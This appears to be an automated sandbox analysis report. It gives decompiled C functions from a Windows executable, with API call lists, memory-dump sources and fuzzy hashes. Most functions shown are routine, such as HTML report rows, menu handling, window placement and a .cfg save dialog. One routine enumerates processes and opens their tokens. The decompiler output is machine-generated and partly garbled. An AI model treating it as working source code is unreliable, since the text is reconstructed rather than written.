                                                                                                                                                                  0x00405a69
                                                                                                                                                                  0x00405a05
                                                                                                                                                                  0x00405a0e
                                                                                                                                                                  0x00405a17
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405a19
                                                                                                                                                                  0x00405a19
                                                                                                                                                                  0x00405a1c
                                                                                                                                                                  0x00405a1d
                                                                                                                                                                  0x00405a20
                                                                                                                                                                  0x00405a29
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405a29
                                                                                                                                                                  0x00405a17
                                                                                                                                                                  0x00405a03
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405a6b
                                                                                                                                                                  0x00405a6e
                                                                                                                                                                  0x00405a72
                                                                                                                                                                  0x00405a72
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004059d4
                                                                                                                                                                  0x00405a81
                                                                                                                                                                  0x00405a84
                                                                                                                                                                  0x00405a8f

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004059B5
                                                                                                                                                                    • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                                                                    • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                                                                                    • Part of subcall function 004095FD: Process32FirstW.KERNEL32 ref: 0040964A
                                                                                                                                                                    • Part of subcall function 004095FD: Process32NextW.KERNEL32 ref: 0040978C
                                                                                                                                                                    • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                                                                                    • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                                                                                    • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409B4B
                                                                                                                                                                    • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                                                                    • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                                                                  • wcschr.MSVCRT ref: 00405A0E
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                                                                  • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 768606695-0
                                                                                                                                                                  • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                                                                  • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                                                                                  • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                                                                  • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                                                                                                                  0x00407639
                                                                                                                                                                  0x00407646
                                                                                                                                                                  0x00407647
                                                                                                                                                                  0x00407654
                                                                                                                                                                  0x0040765f
                                                                                                                                                                  0x0040765f
                                                                                                                                                                  0x0040766b
                                                                                                                                                                  0x0040766d
                                                                                                                                                                  0x00407672
                                                                                                                                                                  0x00407677
                                                                                                                                                                  0x0040767d
                                                                                                                                                                  0x00407680
                                                                                                                                                                  0x00407686
                                                                                                                                                                  0x00407691
                                                                                                                                                                  0x00407697
                                                                                                                                                                  0x00407699
                                                                                                                                                                  0x00407699
                                                                                                                                                                  0x0040769c
                                                                                                                                                                  0x0040769f
                                                                                                                                                                  0x004076a3
                                                                                                                                                                  0x004076a7
                                                                                                                                                                  0x004076ab
                                                                                                                                                                  0x004076b5
                                                                                                                                                                  0x004076be
                                                                                                                                                                  0x004076c8
                                                                                                                                                                  0x004076de
                                                                                                                                                                  0x004076ee
                                                                                                                                                                  0x004076f1
                                                                                                                                                                  0x004076f4
                                                                                                                                                                  0x004076fa
                                                                                                                                                                  0x00407708
                                                                                                                                                                  0x0040770e
                                                                                                                                                                  0x00407718
                                                                                                                                                                  0x0040771d
                                                                                                                                                                  0x00407723
                                                                                                                                                                  0x00407724
                                                                                                                                                                  0x00407727
                                                                                                                                                                  0x0040772c
                                                                                                                                                                  0x0040772f
                                                                                                                                                                  0x00407734
                                                                                                                                                                  0x0040773f
                                                                                                                                                                  0x00407744
                                                                                                                                                                  0x00407745
                                                                                                                                                                  0x0040767d
                                                                                                                                                                  0x00407760

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintfwcscat
                                                                                                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                  • API String ID: 384018552-4153097237
                                                                                                                                                                  • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                                                                  • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                                                                  • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                                                                  • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 42%
                                                                                                                                                                  			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                                                                                                  0x0040605e
                                                                                                                                                                  0x00406061
                                                                                                                                                                  0x00406069
                                                                                                                                                                  0x00406074
                                                                                                                                                                  0x0040607a
                                                                                                                                                                  0x0040607e
                                                                                                                                                                  0x00406082
                                                                                                                                                                  0x00406148
                                                                                                                                                                  0x0040614e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406088
                                                                                                                                                                  0x00406088
                                                                                                                                                                  0x00406093
                                                                                                                                                                  0x00406098
                                                                                                                                                                  0x0040609f
                                                                                                                                                                  0x004060ae
                                                                                                                                                                  0x004060b6
                                                                                                                                                                  0x004060be
                                                                                                                                                                  0x004060c6
                                                                                                                                                                  0x004060ca
                                                                                                                                                                  0x004060cf
                                                                                                                                                                  0x004060d7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004060de
                                                                                                                                                                  0x00406129
                                                                                                                                                                  0x00406129
                                                                                                                                                                  0x0040612d
                                                                                                                                                                  0x0040612f
                                                                                                                                                                  0x00406130
                                                                                                                                                                  0x00406134
                                                                                                                                                                  0x00406137
                                                                                                                                                                  0x0040613c
                                                                                                                                                                  0x0040613c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040612d
                                                                                                                                                                  0x004060e7
                                                                                                                                                                  0x004060f0
                                                                                                                                                                  0x004060f2
                                                                                                                                                                  0x004060f2
                                                                                                                                                                  0x004060f9
                                                                                                                                                                  0x004060fd
                                                                                                                                                                  0x00406102
                                                                                                                                                                  0x0040610c
                                                                                                                                                                  0x00406112
                                                                                                                                                                  0x00406117
                                                                                                                                                                  0x00406117
                                                                                                                                                                  0x00406104
                                                                                                                                                                  0x00406104
                                                                                                                                                                  0x00406104
                                                                                                                                                                  0x00406104
                                                                                                                                                                  0x00406102
                                                                                                                                                                  0x00406122
                                                                                                                                                                  0x00406128
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040613f
                                                                                                                                                                  0x0040613f
                                                                                                                                                                  0x00406140
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                  • API String ID: 2029023288-3849865405
                                                                                                                                                                  • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                                                                  • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                                                                  • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                                                                  • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}
















                                                                                                                                                                  0x00402bee
                                                                                                                                                                  0x00402bf8
                                                                                                                                                                  0x00402cae
                                                                                                                                                                  0x00402c08
                                                                                                                                                                  0x00402c10
                                                                                                                                                                  0x00402c11
                                                                                                                                                                  0x00402c12
                                                                                                                                                                  0x00402c13
                                                                                                                                                                  0x00402c20
                                                                                                                                                                  0x00402c27
                                                                                                                                                                  0x00402c2e
                                                                                                                                                                  0x00402c30
                                                                                                                                                                  0x00402c37
                                                                                                                                                                  0x00402c4b
                                                                                                                                                                  0x00402c50
                                                                                                                                                                  0x00402c53
                                                                                                                                                                  0x00402c55
                                                                                                                                                                  0x00402c3e
                                                                                                                                                                  0x00402c3e
                                                                                                                                                                  0x00402c41
                                                                                                                                                                  0x00402c41
                                                                                                                                                                  0x00402c5a
                                                                                                                                                                  0x00402c60
                                                                                                                                                                  0x00402c65
                                                                                                                                                                  0x00402c68
                                                                                                                                                                  0x00402c6d
                                                                                                                                                                  0x00402c77
                                                                                                                                                                  0x00402c7c
                                                                                                                                                                  0x00402c7e
                                                                                                                                                                  0x00402c87
                                                                                                                                                                  0x00402ca5
                                                                                                                                                                  0x00402ca5
                                                                                                                                                                  0x00402c87
                                                                                                                                                                  0x00402c7c
                                                                                                                                                                  0x00402c6d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402cac

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                                                                                  • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                                                                                  • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                                                                                  • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                                                                                  • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                                                                                  • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MetricsSystem$Window
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1155976603-0
                                                                                                                                                                  • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                                                                  • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                                                                                  • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                                                                  • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                                                                                                                  0x004036ef
                                                                                                                                                                  0x004036f6
                                                                                                                                                                  0x0040370b
                                                                                                                                                                  0x00403712
                                                                                                                                                                  0x00403717
                                                                                                                                                                  0x0040371c
                                                                                                                                                                  0x0040371f
                                                                                                                                                                  0x0040372c
                                                                                                                                                                  0x00403735
                                                                                                                                                                  0x00403738
                                                                                                                                                                  0x00403744
                                                                                                                                                                  0x00403751
                                                                                                                                                                  0x00403758
                                                                                                                                                                  0x00403760
                                                                                                                                                                  0x00403769
                                                                                                                                                                  0x0040376c
                                                                                                                                                                  0x00403778
                                                                                                                                                                  0x0040377b
                                                                                                                                                                  0x0040378b
                                                                                                                                                                  0x00403792
                                                                                                                                                                  0x00403795
                                                                                                                                                                  0x00403798
                                                                                                                                                                  0x0040379b
                                                                                                                                                                  0x004037a2
                                                                                                                                                                  0x004037a5
                                                                                                                                                                  0x004037a8
                                                                                                                                                                  0x004037af
                                                                                                                                                                  0x004037b7
                                                                                                                                                                  0x004037c3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004037d4
                                                                                                                                                                  0x004037dc

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004036F6
                                                                                                                                                                  • memset.MSVCRT ref: 00403712
                                                                                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                    • Part of subcall function 00405B81: LoadStringW.USER32 ref: 00405C59
                                                                                                                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT(00000000,00000002,?,?,00403490), ref: 00405C99
                                                                                                                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                    • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                                                                    • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                                                                    • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                                                                    • Part of subcall function 00405236: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),E80040CB,004034B5), ref: 004052A9
                                                                                                                                                                    • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                                                                    • Part of subcall function 00405236: memcpy.MSVCRT(?,004034B5,?,004034B5,?,?,?,?,?,00000400,%s (%s),E80040CB,004034B5), ref: 004052CA
                                                                                                                                                                  • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                                                                  • wcscpy.MSVCRT ref: 004037C3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                                                                  • String ID: L$cfg
                                                                                                                                                                  • API String ID: 275899518-3734058911
                                                                                                                                                                  • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                                                                  • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                                                                  • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                                                                  • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                                                                                                                  0x00404ed0
                                                                                                                                                                  0x00404edf
                                                                                                                                                                  0x00404ef6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404f00
                                                                                                                                                                  0x00404f1c
                                                                                                                                                                  0x00404f31
                                                                                                                                                                  0x00404f41
                                                                                                                                                                  0x00404f4e
                                                                                                                                                                  0x00404f5d
                                                                                                                                                                  0x00404f66
                                                                                                                                                                  0x00404f69
                                                                                                                                                                  0x00404f69
                                                                                                                                                                  0x00404f71
                                                                                                                                                                  0x00404f77
                                                                                                                                                                  0x00404f7d

                                                                                                                                                                  APIs
                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00404F41
                                                                                                                                                                  • wcscat.MSVCRT ref: 00404F4E
                                                                                                                                                                  • wcscat.MSVCRT ref: 00404F5D
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00404F71
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1331804452-0
